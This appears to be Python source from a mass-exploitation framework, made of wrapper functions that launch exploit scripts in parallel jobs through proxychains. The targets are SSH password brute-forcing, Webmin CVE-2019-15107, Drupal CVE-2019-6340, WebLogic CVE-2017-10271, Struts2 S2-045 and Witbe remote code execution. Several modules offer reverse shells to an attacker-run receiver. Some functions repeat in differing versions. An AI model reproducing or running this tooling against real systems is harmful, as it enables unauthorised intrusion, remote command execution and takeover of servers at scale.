def ssh_bruteforcer(session): ''' call single thread ssh_bruteforcer ''' password_list = console.input_check( "[*] Password list file to use: ", allow_blank=False) if not os.path.isfile(password_list): console.print_error("[-] Password list not found") return None # command to exec command = console.input_check("[*] Command to exec: ", allow_blank=False) # args list exploit = 'ssh_bruteforce.py' work_path = '/ssh-bruteforce/' exec_path = exploit custom_args = str(password_list + ' ' + command).split() jobs = 100 print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path, ' '.join(custom_args))) # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def ssh_bruteforcer(session): ''' bruteforce one target using a password list ''' colors.colored_print('\n[*] Welcome to SSH bruteforcer', colors.BLUE) password_list = console.input_check( "[*] Password list file to use (put them under ./data): ", allow_blank=False, choices=glob.glob(core.MECROOT+"/data/*.txt")) if not os.path.isfile(password_list): console.print_error("[-] Password list not found") return None # command to exec command = console.input_check("[*] Command to exec: ", allow_blank=False) # args list exploit = 'ssh_bruteforce.py' work_path = '/ssh-bruteforce/' exec_path = exploit custom_args = ["-p", password_list, "-c", command] jobs = 100 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def weblogic(session): ''' with reverse shell ''' print(colors.BLUE + '\n[*] Welcome to Weblogic getshell exploit' + colors.END) server_port = console.input_check( "[?] What's the port of Welogic server? ", check_type=int) os_type = console.input_check( '[?] Windows or Linux? [w/l] ', choices=['w', 'l']) if console.input_check('[?] Do you need a reverse shell? [y/n] ', choices=['y', 'n']) == 'y': shell_server = console.input_check( '[?] What\'s the IP of shell receiver? ', allow_blank=False, ip_check=True) port = console.input_check( '[?] What\'s the port of shell receiver? ', check_type=int) if os_type.lower() == 'w': custom_args = '-l {} -p {} -P {} --silent -T '.format( shell_server, port, server_port) +\ 'reverse_shell -os win' custom_args = custom_args.split() elif os_type.lower() == 'l': custom_args = '-l {} -p {} -P {} --silent -T '.format( shell_server, port, server_port) +\ 'reverse_shell -os linux' custom_args = custom_args.split() else: console.print_error('[-] Invalid input') return None else: cmd = console.input_check( '[?] What command do you want to execute on the target? ', allow_blank=False).strip() if os_type.lower() == 'w': custom_args = '-P {} --silent -T exploit -c {} -os win'.format( server_port, cmd).split() elif os_type.lower() == 'l': custom_args = '-P {} --silent -T exploit -c {} -os linux'.format( server_port, cmd).split() else: return None # start scanner exploit = 'weblogic.py' work_path = '/weblogic/' exec_path = exploit jobs = 100 # waitTime = 25 # deprecated return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def webmin_cve_2019_15107(session): ''' CVE_2019_15107 RCE ''' colors.colored_print('\n[*] Welcome to Webmin CVE-2019-15107', colors.BLUE) # shell server config command = console.input_check( '[?] Command to execute on the target: ', allow_blank=False) # exploit config exploit = 'webmin.py' work_path = '/webmin/' exec_path = exploit custom_args = ["-c", command] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def witbe(session): ''' witbe rce ''' colors.colored_print('\n[*] Welcome to Witbe RCE', colors.BLUE) # shell server config rhost = console.input_check('[?] IP of your shell server: ', ip_check=True) rport = console.input_check('[?] and Port? ', check_type=int) # exploit config exploit = 'witbe.py' work_path = '/witbe/' exec_path = exploit custom_args = ["-l", rhost, "-p", rport] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def drupal_cve20196340(session): ''' drupal RCE ''' colors.colored_print('\n[*] Welcome to Drupal CVE-2019-6340', colors.BLUE) # shell server config command = console.input_check('[?] Command to execute on the target: ', allow_blank=False) # exploit config exploit = 'cve-2019-6340_cmd.py' work_path = '/drupal/' exec_path = exploit custom_args = ["-c", command] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)
def weblogic_cve201710271(session): ''' CVE-2017-10271 ''' colors.colored_print( '\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE) # shell server config command = console.input_check( '[?] Command to execute on the target: ', allow_blank=False) # exploit config exploit = 'weblogic_cve-2017-10271.py' work_path = '/weblogic/' exec_path = exploit custom_args = ["-c", command] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def witbe(session): ''' witbe rce ''' print(colors.BLUE + '\n[*] Welcome to Witbe RCE' + colors.END) # shell server config rhost = console.input_check('[?] IP of your shell server: ') rport = console.input_check('[?] and Port? ', check_type=int) # exploit config exploit = 'witbe.py' work_path = '/witbe/' exec_path = exploit custom_args = str('-l ' + rhost + ' -p ' + rport).split() jobs = 50 print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(exec_path), ' '.join(custom_args)) # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def s2_045(session): ''' struts2 045 rce ''' print(colors.BLUE + '\n[*] Welcome to S2-045' + colors.END) port = console.input_check( '[?] What\'s the port of your target server? ', check_type=int) # args list exploit = 's2_045_cmd.py' work_path = '/structs2/' exec_path = exploit custom_args = str('-p ' + port).split() jobs = 100 print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path, ' '.join(custom_args))) # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def weblogic_cve201710271(session): ''' CVE-2017-10271 ''' colors.colored_print('\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE) # shell server config command = console.input_check('[?] Command to execute on the target: ', allow_blank=False) target_os = console.input_check( "[?] Target OS, default to linux [linux/win]: ", choices=["linux", "win"]) # exploit config exploit = 'weblogic_cve-2017-10271.py' work_path = '/weblogic/' exec_path = exploit custom_args = ["-c", command, "-os", target_os] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)